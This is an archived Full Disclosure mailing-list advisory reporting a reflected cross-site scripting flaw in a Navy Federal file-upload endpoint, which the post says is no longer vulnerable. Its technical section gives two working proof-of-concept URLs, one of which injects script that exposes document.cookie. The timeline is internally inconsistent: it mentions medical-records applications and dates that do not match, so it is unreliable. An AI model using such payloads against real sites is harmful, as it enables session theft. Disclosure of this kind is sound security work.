| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BLAPR15MB3953691FD66564E069EB7C0ED13E0@BLAPR15MB3953.namprd15.prod.outlook.com> Date: Thu, 17 Sep 2020 21:14:51 +0000 From: Juan Avila <javila@...hrocyber.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] Navy Federal Reflective Cross Site Scripting (XSS) Vendor ------------------------------------------------- Navy Federal - (https://www.navyfederal.org/ Product ------------------------------------------------- Front pubic facing application Credit ------------------------------------------------- Arthrocyber http://arthrocyber.com/research/#finding_7 David Reyes Vulnerability Summary ------------------------------------------------- The endpoint sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain did not sanitize HTML characters. It was possible to pass HTML code which triggered an XSS. Technical Details ------------------------------------------------- The parameter "type" failed to properly sanitize HTML characters resulting in reflective XSS. https://sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain?OpenForm&Seq=1&Type=%22%3E%3Cscript%3Ealert(%225-2-17--Reflective-Arthrocyber-XSS%22)%3C/script%3E https://sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain?OpenForm&Seq=1&Type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eß Solution ------------------------------------------------- Reference OWASP top 10. https://owasp.org/www-community/attacks/xss/ Timeline ------------------------------------------------- 07 May 2019 - Adaptive Security Consulting discovered a series of vulnerabilities in medical records management and search applications being considered by our client September 2020 - Endpoint no longer appears to be vulnerable to XSS. Juan Avila Arthrocyber, LLC Cell (682)238-7188 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists